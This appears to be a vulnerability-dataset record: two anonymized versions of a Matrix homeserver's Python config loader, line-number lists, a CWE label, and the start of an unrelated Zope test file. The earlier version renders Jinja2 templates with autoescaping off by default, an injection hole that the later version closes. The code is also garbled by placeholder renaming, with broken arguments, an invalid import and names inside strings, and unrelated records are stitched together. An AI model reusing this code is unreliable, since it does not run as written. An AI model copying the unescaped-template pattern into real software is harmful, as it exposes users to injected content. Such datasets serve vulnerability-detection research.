def FUNC_10(VAR_15, VAR_4, VAR_16):
VAR_15.check_file(VAR_4, VAR_16)
with open(VAR_4) as file_stream:
return file_stream.read()
def FUNC_11(
self,
VAR_18: List[str],
VAR_19: Optional[str] = None,
VAR_20: bool = False,
) -> List[jinja2.Template]:
VAR_57 = []
VAR_58 = [self.default_template_dir]
if VAR_19:
if not self.path_exists(VAR_19):
raise CLASS_0(
"Configured VAR_73 directory does not exist: %s"
% (VAR_19,)
)
VAR_58.insert(0, VAR_19)
VAR_59 = jinja2.FileSystemLoader(VAR_58)
VAR_60 = jinja2.Environment(VAR_59=loader, VAR_20=autoescape)
VAR_60.filters.update(
{
"format_ts": FUNC_1,
"mxc_to_http": FUNC_2(self.public_baseurl),
}
)
for filename in VAR_18:
VAR_73 = VAR_60.get_template(filename)
VAR_57.append(VAR_73)
return VAR_57
def FUNC_1(VAR_5: int, VAR_6: str):
return time.strftime(VAR_6, time.localtime(VAR_5 / 1000))
def FUNC_2(VAR_7: str) -> Callable:
def FUNC_12(VAR_5, VAR_21, VAR_22, VAR_23="crop"):
if VAR_5[0:6] != "mxc://":
return ""
VAR_61 = VAR_5[6:]
VAR_62 = None
if "#" in VAR_61:
server_and_media_id, VAR_62 = VAR_61.split("#", 1)
VAR_62 = "#" + VAR_62
VAR_63 = {"width": VAR_21, "height": VAR_22, "method": VAR_23}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
VAR_7,
VAR_61,
urllib.parse.urlencode(VAR_63),
VAR_62 or "",
)
return FUNC_12
class CLASS_2:
VAR_24 = []
def __init__(self):
self._configs = OrderedDict()
for VAR_74 in self.config_classes:
if VAR_74.section is None:
raise ValueError("%r requires a VAR_12 name" % (VAR_74,))
try:
VAR_78 = VAR_74(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (VAR_74.section, e))
self._configs[VAR_74.section] = VAR_78
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in self._configs.keys():
return self._configs[VAR_14]
return self._get_unclassed_config(None, VAR_14)
def FUNC_13(self, VAR_25: Optional[str], VAR_14: str):
for VAR_47, val in self._configs.items():
if VAR_47 == VAR_25:
continue
if VAR_14 in dir(val):
return getattr(val, VAR_14)
raise AttributeError(VAR_14, "not found in %s" % (list(self._configs.keys()),))
def FUNC_14(self, VAR_26: str, *VAR_27, **VAR_28) -> MutableMapping[str, Any]:
VAR_64 = OrderedDict()
for VAR_79, config in self._configs.items():
if hasattr(config, VAR_26):
VAR_64[VAR_79] = getattr(config, VAR_26)(*VAR_27, **VAR_28)
return VAR_64
@classmethod
def FUNC_15(VAR_15, VAR_26: str, *VAR_27, **VAR_28):
for config in VAR_15.config_classes:
if hasattr(config, VAR_26):
getattr(config, VAR_26)(*VAR_27, **VAR_28)
def FUNC_16(
self,
VAR_29,
VAR_30,
VAR_31,
VAR_32=False,
VAR_33=None,
VAR_34=False,
VAR_35=None,
VAR_36=None,
VAR_37=None,
VAR_38=None,
):
return VAR_3 + "\n\n".join(
dedent(VAR_78)
for VAR_78 in self.invoke_all(
"generate_config_section",
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_32=generate_secrets,
VAR_33=report_stats,
VAR_34=open_private_ports,
VAR_35=listeners,
VAR_36=tls_certificate_path,
VAR_37=tls_private_key_path,
VAR_38=acme_domain,
).values()
)
@classmethod
def FUNC_17(VAR_15, VAR_39, VAR_40):
VAR_41 = argparse.ArgumentParser(VAR_39=description)
VAR_15.add_arguments_to_parser(VAR_41)
VAR_65, VAR_66 = VAR_15.load_config_with_parser(VAR_41, VAR_40)
return VAR_65
@classmethod
def FUNC_18(VAR_15, VAR_41):
VAR_41.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_81.",
)
VAR_41.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where VAR_81 such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
VAR_15.invoke_all_static("add_arguments", VAR_41)
@classmethod
def FUNC_19(VAR_15, VAR_42, VAR_40):
VAR_65 = VAR_15()
VAR_67 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_67.config_path)
if not VAR_8:
VAR_42.error("Must supply a config file.")
if VAR_67.keys_directory:
VAR_29 = VAR_67.keys_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_43 = FUNC_3(VAR_8)
VAR_65.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_65.invoke_all("read_arguments", VAR_67)
return VAR_65, VAR_67
@classmethod
def FUNC_20(VAR_15, VAR_39, VAR_40):
VAR_42 = argparse.ArgumentParser(VAR_39=description)
VAR_42.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_81.",
)
VAR_68 = VAR_42.add_argument_group("Config generation")
VAR_68.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
VAR_68.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config VAR_81, then exit.",
)
VAR_68.add_argument(
"-H", "--server-name", help="The server VAR_79 to generate a config file for."
)
VAR_68.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
VAR_68.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config VAR_81 such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
VAR_68.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
VAR_68.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
VAR_15.invoke_all_static("add_arguments", VAR_42)
VAR_67 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_67.config_path)
if not VAR_8:
VAR_42.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if VAR_67.config_directory:
VAR_29 = VAR_67.config_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_69 = VAR_67.generate_missing_configs
VAR_65 = VAR_15()
if VAR_67.generate_config:
if VAR_67.report_stats is None:
VAR_42.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ VAR_1
)
(VAR_75,) = VAR_8
if not FUNC_0(VAR_75):
print("Generating config file %s" % (VAR_75,))
if VAR_67.data_directory:
VAR_30 = VAR_67.data_directory
else:
VAR_30 = os.getcwd()
VAR_30 = os.path.abspath(VAR_30)
VAR_31 = VAR_67.server_name
if not VAR_31:
raise CLASS_0(
"Must specify a VAR_31 to a generate config for."
" Pass -H server.name."
)
VAR_80 = VAR_65.generate_config(
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_33=(VAR_67.report_stats == "yes"),
VAR_32=True,
VAR_34=VAR_67.open_private_ports,
)
if not FUNC_0(VAR_29):
os.makedirs(VAR_29)
with open(VAR_75, "w") as config_file:
config_file.write(VAR_80)
config_file.write("\n\n# vim:ft=yaml")
VAR_43 = yaml.safe_load(VAR_80)
VAR_65.generate_missing_files(VAR_43, VAR_29)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (VAR_75, VAR_31)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" VAR_81."
)
% (VAR_75,)
)
VAR_69 = True
VAR_43 = FUNC_3(VAR_8)
if VAR_69:
VAR_65.generate_missing_files(VAR_43, VAR_29)
return None
VAR_65.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_65.invoke_all("read_arguments", VAR_67)
return VAR_65
def FUNC_21(self, VAR_43, VAR_29=None, VAR_30=None):
self.invoke_all(
"read_config",
VAR_43,
VAR_29=config_dir_path,
VAR_30=data_dir_path,
)
def FUNC_22(self, VAR_43, VAR_29):
self.invoke_all("generate_files", VAR_43, VAR_29)
def FUNC_3(VAR_8):
VAR_44 = {}
for config_file in VAR_8:
with open(config_file) as file_stream:
VAR_76 = yaml.safe_load(file_stream)
if not isinstance(VAR_76, dict):
VAR_77 = "File %r is empty or doesn't parse into a VAR_47-VAR_5 map. IGNORING."
print(VAR_77 % (config_file,))
continue
VAR_44.update(VAR_76)
if "server_name" not in VAR_44:
raise CLASS_0(VAR_2)
if "report_stats" not in VAR_44:
raise CLASS_0(
VAR_0 + "\n" + VAR_1
)
return VAR_44
def FUNC_4(VAR_9):
VAR_8 = []
if VAR_9:
for VAR_75 in VAR_9:
if os.path.isdir(VAR_75):
VAR_81 = []
for entry in os.listdir(VAR_75):
VAR_82 = os.path.join(VAR_75, entry)
if not os.path.isfile(VAR_82):
VAR_77 = "Found subdirectory in config directory: %r. IGNORING."
print(VAR_77 % (VAR_82,))
continue
if not entry.endswith(".yaml"):
VAR_77 = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(VAR_77 % (VAR_82,))
continue
VAR_81.append(VAR_82)
VAR_8.extend(sorted(VAR_81))
else:
VAR_8.append(VAR_75)
return VAR_8
@attr.s
class CLASS_3:
VAR_45 = attr.ib(type=List[str])
def FUNC_23(self, VAR_46: str, VAR_47: str) -> bool:
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(VAR_47) == VAR_46
def FUNC_24(self, VAR_47: str) -> str:
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
VAR_70 = sha256(VAR_47.encode("utf8")).digest()
VAR_71 = int.from_bytes(VAR_70, byteorder="little")
VAR_72 = VAR_71 % (len(self.instances))
return self.instances[VAR_72]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
|
import argparse
import .errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class CLASS_0(Exception):
def __init__(self, VAR_10: str, VAR_11: Optional[Iterable[str]] = None):
self.msg = VAR_10
self.path = VAR_11
VAR_0 = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `VAR_33` VAR_47 in your config file to either True or False.
"""
VAR_1 = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
VAR_2 = """\
Missing mandatory `VAR_31` config option.
"""
VAR_3 = """\
"""
def FUNC_0(VAR_4):
try:
os.stat(VAR_4)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class CLASS_1:
VAR_12 = None
def __init__(self, VAR_13=None):
self.root = VAR_13
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in ["generate_config_section", "read_config"]:
raise AttributeError(VAR_14)
if self.root is None:
raise AttributeError(VAR_14)
else:
return self.root._get_unclassed_config(self.section, VAR_14)
@staticmethod
def FUNC_5(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_48 = {"K": 1024, "M": 1024 * 1024}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_6(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_51 = 1000
VAR_52 = 60 * VAR_51
VAR_53 = 60 * VAR_52
VAR_54 = 24 * VAR_53
VAR_55 = 7 * VAR_54
VAR_56 = 365 * VAR_54
VAR_48 = {"s": VAR_51, "m": VAR_52, "h": VAR_53, "d": VAR_54, "w": VAR_55, "y": VAR_56}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_7(VAR_4):
return os.path.abspath(VAR_4) if VAR_4 else VAR_4
@classmethod
def FUNC_0(VAR_15, VAR_4):
return FUNC_0(VAR_4)
@classmethod
def FUNC_8(VAR_15, VAR_4, VAR_16):
if VAR_4 is None:
raise CLASS_0("Missing config for %s." % (VAR_16,))
try:
os.stat(VAR_4)
except OSError as e:
raise CLASS_0(
"Error accessing file '%s' (config for %s): %s"
% (VAR_4, VAR_16, e.strerror)
)
return VAR_15.abspath(VAR_4)
@classmethod
def FUNC_9(VAR_15, VAR_17):
dir_path = VAR_15.abspath(VAR_17)
try:
os.makedirs(VAR_17)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(VAR_17):
raise CLASS_0("%s is not a directory" % (VAR_17,))
return VAR_17
@classmethod
def FUNC_10(VAR_15, VAR_4, VAR_16):
VAR_15.check_file(VAR_4, VAR_16)
with open(VAR_4) as file_stream:
return file_stream.read()
def FUNC_11(self, VAR_18: str) -> jinja2.Template:
return self.read_templates([VAR_18])[0]
def FUNC_12(
self, VAR_19: List[str], VAR_20: Optional[str] = None,
) -> List[jinja2.Template]:
VAR_57 = [self.default_template_dir]
if VAR_20:
if not self.path_exists(VAR_20):
raise CLASS_0(
"Configured template directory does not exist: %s"
% (VAR_20,)
)
VAR_57.insert(0, VAR_20)
VAR_58 = jinja2.FileSystemLoader(VAR_57)
VAR_59 = jinja2.Environment(VAR_58=loader, autoescape=jinja2.select_autoescape(),)
VAR_59.filters.update(
{
"format_ts": FUNC_1,
"mxc_to_http": FUNC_2(self.public_baseurl),
}
)
return [VAR_59.get_template(VAR_18) for VAR_18 in VAR_19]
def FUNC_1(VAR_5: int, VAR_6: str):
return time.strftime(VAR_6, time.localtime(VAR_5 / 1000))
def FUNC_2(VAR_7: str) -> Callable:
def FUNC_13(VAR_5, VAR_21, VAR_22, VAR_23="crop"):
if VAR_5[0:6] != "mxc://":
return ""
VAR_60 = VAR_5[6:]
VAR_61 = None
if "#" in VAR_60:
server_and_media_id, VAR_61 = VAR_60.split("#", 1)
VAR_61 = "#" + VAR_61
VAR_62 = {"width": VAR_21, "height": VAR_22, "method": VAR_23}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
VAR_7,
VAR_60,
urllib.parse.urlencode(VAR_62),
VAR_61 or "",
)
return FUNC_13
class CLASS_2:
VAR_24 = []
def __init__(self):
self._configs = OrderedDict()
for VAR_72 in self.config_classes:
if VAR_72.section is None:
raise ValueError("%r requires a VAR_12 name" % (VAR_72,))
try:
VAR_76 = VAR_72(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (VAR_72.section, e))
self._configs[VAR_72.section] = VAR_76
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in self._configs.keys():
return self._configs[VAR_14]
return self._get_unclassed_config(None, VAR_14)
def FUNC_14(self, VAR_25: Optional[str], VAR_14: str):
for VAR_47, val in self._configs.items():
if VAR_47 == VAR_25:
continue
if VAR_14 in dir(val):
return getattr(val, VAR_14)
raise AttributeError(VAR_14, "not found in %s" % (list(self._configs.keys()),))
def FUNC_15(self, VAR_26: str, *VAR_27, **VAR_28) -> MutableMapping[str, Any]:
VAR_63 = OrderedDict()
for VAR_77, config in self._configs.items():
if hasattr(config, VAR_26):
VAR_63[VAR_77] = getattr(config, VAR_26)(*VAR_27, **VAR_28)
return VAR_63
@classmethod
def FUNC_16(VAR_15, VAR_26: str, *VAR_27, **VAR_28):
for config in VAR_15.config_classes:
if hasattr(config, VAR_26):
getattr(config, VAR_26)(*VAR_27, **VAR_28)
def FUNC_17(
self,
VAR_29,
VAR_30,
VAR_31,
VAR_32=False,
VAR_33=None,
VAR_34=False,
VAR_35=None,
VAR_36=None,
VAR_37=None,
VAR_38=None,
):
return VAR_3 + "\n\n".join(
dedent(VAR_76)
for VAR_76 in self.invoke_all(
"generate_config_section",
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_32=generate_secrets,
VAR_33=report_stats,
VAR_34=open_private_ports,
VAR_35=listeners,
VAR_36=tls_certificate_path,
VAR_37=tls_private_key_path,
VAR_38=acme_domain,
).values()
)
@classmethod
def FUNC_18(VAR_15, VAR_39, VAR_40):
VAR_41 = argparse.ArgumentParser(VAR_39=description)
VAR_15.add_arguments_to_parser(VAR_41)
VAR_64, VAR_65 = VAR_15.load_config_with_parser(VAR_41, VAR_40)
return VAR_64
@classmethod
def FUNC_19(VAR_15, VAR_41):
VAR_41.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_79.",
)
VAR_41.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where VAR_79 such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
VAR_15.invoke_all_static("add_arguments", VAR_41)
@classmethod
def FUNC_20(VAR_15, VAR_42, VAR_40):
VAR_64 = VAR_15()
VAR_66 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_66.config_path)
if not VAR_8:
VAR_42.error("Must supply a config file.")
if VAR_66.keys_directory:
VAR_29 = VAR_66.keys_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_43 = FUNC_3(VAR_8)
VAR_64.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_64.invoke_all("read_arguments", VAR_66)
return VAR_64, VAR_66
@classmethod
def FUNC_21(VAR_15, VAR_39, VAR_40):
VAR_42 = argparse.ArgumentParser(VAR_39=description)
VAR_42.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_79.",
)
VAR_67 = VAR_42.add_argument_group("Config generation")
VAR_67.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
VAR_67.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config VAR_79, then exit.",
)
VAR_67.add_argument(
"-H", "--server-name", help="The server VAR_77 to generate a config file for."
)
VAR_67.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
VAR_67.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config VAR_79 such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
VAR_67.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
VAR_67.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
VAR_15.invoke_all_static("add_arguments", VAR_42)
VAR_66 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_66.config_path)
if not VAR_8:
VAR_42.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if VAR_66.config_directory:
VAR_29 = VAR_66.config_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_68 = VAR_66.generate_missing_configs
VAR_64 = VAR_15()
if VAR_66.generate_config:
if VAR_66.report_stats is None:
VAR_42.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ VAR_1
)
(VAR_73,) = VAR_8
if not FUNC_0(VAR_73):
print("Generating config file %s" % (VAR_73,))
if VAR_66.data_directory:
VAR_30 = VAR_66.data_directory
else:
VAR_30 = os.getcwd()
VAR_30 = os.path.abspath(VAR_30)
VAR_31 = VAR_66.server_name
if not VAR_31:
raise CLASS_0(
"Must specify a VAR_31 to a generate config for."
" Pass -H server.name."
)
VAR_78 = VAR_64.generate_config(
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_33=(VAR_66.report_stats == "yes"),
VAR_32=True,
VAR_34=VAR_66.open_private_ports,
)
if not FUNC_0(VAR_29):
os.makedirs(VAR_29)
with open(VAR_73, "w") as config_file:
config_file.write(VAR_78)
config_file.write("\n\n# vim:ft=yaml")
VAR_43 = yaml.safe_load(VAR_78)
VAR_64.generate_missing_files(VAR_43, VAR_29)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (VAR_73, VAR_31)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" VAR_79."
)
% (VAR_73,)
)
VAR_68 = True
VAR_43 = FUNC_3(VAR_8)
if VAR_68:
VAR_64.generate_missing_files(VAR_43, VAR_29)
return None
VAR_64.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_64.invoke_all("read_arguments", VAR_66)
return VAR_64
def FUNC_22(self, VAR_43, VAR_29=None, VAR_30=None):
self.invoke_all(
"read_config",
VAR_43,
VAR_29=config_dir_path,
VAR_30=data_dir_path,
)
def FUNC_23(self, VAR_43, VAR_29):
self.invoke_all("generate_files", VAR_43, VAR_29)
def FUNC_3(VAR_8):
VAR_44 = {}
for config_file in VAR_8:
with open(config_file) as file_stream:
VAR_74 = yaml.safe_load(file_stream)
if not isinstance(VAR_74, dict):
VAR_75 = "File %r is empty or doesn't parse into a VAR_47-VAR_5 map. IGNORING."
print(VAR_75 % (config_file,))
continue
VAR_44.update(VAR_74)
if "server_name" not in VAR_44:
raise CLASS_0(VAR_2)
if "report_stats" not in VAR_44:
raise CLASS_0(
VAR_0 + "\n" + VAR_1
)
return VAR_44
def FUNC_4(VAR_9):
VAR_8 = []
if VAR_9:
for VAR_73 in VAR_9:
if os.path.isdir(VAR_73):
VAR_79 = []
for entry in os.listdir(VAR_73):
VAR_80 = os.path.join(VAR_73, entry)
if not os.path.isfile(VAR_80):
VAR_75 = "Found subdirectory in config directory: %r. IGNORING."
print(VAR_75 % (VAR_80,))
continue
if not entry.endswith(".yaml"):
VAR_75 = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(VAR_75 % (VAR_80,))
continue
VAR_79.append(VAR_80)
VAR_8.extend(sorted(VAR_79))
else:
VAR_8.append(VAR_73)
return VAR_8
@attr.s
class CLASS_3:
VAR_45 = attr.ib(type=List[str])
def FUNC_24(self, VAR_46: str, VAR_47: str) -> bool:
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(VAR_47) == VAR_46
def FUNC_25(self, VAR_47: str) -> str:
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
VAR_69 = sha256(VAR_47.encode("utf8")).digest()
VAR_70 = int.from_bytes(VAR_69, byteorder="little")
VAR_71 = VAR_70 % (len(self.instances))
return self.instances[VAR_71]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
27,
32,
33,
36,
42,
46,
47,
48,
49,
54,
61,
64,
68,
69,
71,
72,
73,
74,
75,
76,
77,
78,
80,
81,
84,
88,
99,
100,
104,
111,
113,
116,
117,
121,
125,
131,
136,
148,
166,
170,
174,
187,
199,
205,
213,
217,
219,
222,
225,
228,
231,
237,
238,
239,
241,
247,
248,
250,
253,
254,
261,
263,
266,
268,
269,
272,
273,
276,
280,
284,
290,
298,
300,
301,
305,
312,
314,
317,
321,
327,
337,
339,
344,
349,
357,
360,
362,
367,
377,
381,
383,
389,
401,
417,
420,
424,
427,
430,
434,
437,
440,
456,
457,
460,
462,
464,
467,
471,
488,
492,
494,
500,
502,
506,
508,
510,
514,
523,
531,
533,
537,
539,
541,
545,
551,
553,
555,
557,
560,
567,
572,
574,
576,
580,
582,
594,
642,
645,
647,
654,
661,
663,
665,
672,
676,
682,
689,
698,
704,
707,
726,
731,
736,
738,
741,
744,
747,
757,
760,
761,
764,
767,
774,
779,
781,
784,
790,
791,
797,
800,
804,
809,
810,
811,
819,
827,
829,
834,
835,
840,
845,
847,
851,
854,
856,
859,
864,
867,
870,
871,
872,
873,
874,
875,
876,
881,
882,
884,
35,
36,
37,
38,
39,
40,
41,
83,
84,
85,
86,
87,
88,
89,
90,
91,
102,
103,
104,
105,
106,
107,
108,
109,
110,
275,
276,
277,
278,
279,
303,
304,
305,
306,
307,
308,
309,
310,
311,
763,
764,
765,
766,
767,
768,
769,
793,
794,
795,
796,
797,
798,
799,
800,
801,
802,
803,
838,
839,
840,
841,
842,
843,
844,
123,
124,
125,
126,
127,
128,
212,
213,
214,
215,
216,
217,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
233,
234,
329,
330,
331,
332,
333,
334,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
415,
416,
417,
418,
419,
420,
421,
422,
423,
424,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
491,
492,
493,
494,
495,
496,
505,
506,
507,
508,
509,
510,
511,
512,
513,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
547,
548,
549,
550,
579,
580,
581,
582,
583,
584,
740,
741,
742,
743,
744,
745,
746,
747,
748,
749,
750,
849,
850,
858,
859,
860,
861,
862,
863
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
27,
32,
33,
36,
42,
46,
47,
48,
49,
54,
61,
64,
68,
69,
71,
72,
73,
74,
75,
76,
77,
78,
80,
81,
84,
88,
99,
100,
104,
111,
113,
116,
117,
121,
125,
131,
136,
148,
166,
170,
174,
187,
199,
205,
208,
211,
214,
217,
220,
225,
230,
234,
237,
240,
243,
246,
251,
252,
253,
255,
261,
262,
264,
267,
268,
275,
276,
278,
279,
282,
283,
286,
290,
294,
300,
308,
310,
311,
315,
322,
324,
327,
331,
337,
347,
349,
354,
359,
367,
370,
372,
377,
387,
391,
393,
399,
411,
427,
430,
434,
437,
440,
444,
447,
450,
466,
467,
470,
472,
474,
477,
481,
498,
502,
504,
510,
512,
516,
518,
520,
524,
533,
541,
543,
547,
549,
551,
555,
561,
563,
565,
567,
570,
577,
582,
584,
586,
590,
592,
604,
652,
655,
657,
664,
671,
673,
675,
682,
686,
692,
699,
708,
714,
717,
736,
741,
746,
748,
751,
754,
757,
767,
770,
771,
774,
777,
784,
789,
791,
794,
800,
801,
807,
810,
814,
819,
820,
821,
829,
837,
839,
844,
845,
850,
855,
857,
861,
864,
866,
869,
874,
877,
880,
881,
882,
883,
884,
885,
886,
891,
892,
894,
35,
36,
37,
38,
39,
40,
41,
83,
84,
85,
86,
87,
88,
89,
90,
91,
102,
103,
104,
105,
106,
107,
108,
109,
110,
285,
286,
287,
288,
289,
313,
314,
315,
316,
317,
318,
319,
320,
321,
773,
774,
775,
776,
777,
778,
779,
803,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
848,
849,
850,
851,
852,
853,
854,
123,
124,
125,
126,
127,
128,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
217,
218,
219,
220,
221,
222,
223,
229,
230,
231,
232,
233,
234,
235,
236,
237,
238,
239,
240,
241,
242,
243,
244,
245,
246,
247,
248,
249,
339,
340,
341,
342,
343,
344,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
501,
502,
503,
504,
505,
506,
515,
516,
517,
518,
519,
520,
521,
522,
523,
546,
547,
548,
549,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
589,
590,
591,
592,
593,
594,
750,
751,
752,
753,
754,
755,
756,
757,
758,
759,
760,
859,
860,
868,
869,
870,
871,
872,
873
] |
4CWE-601
| ##############################################################################
#
# Copyright (c) 2001 Zope Foundation and Contributors
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this
# distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
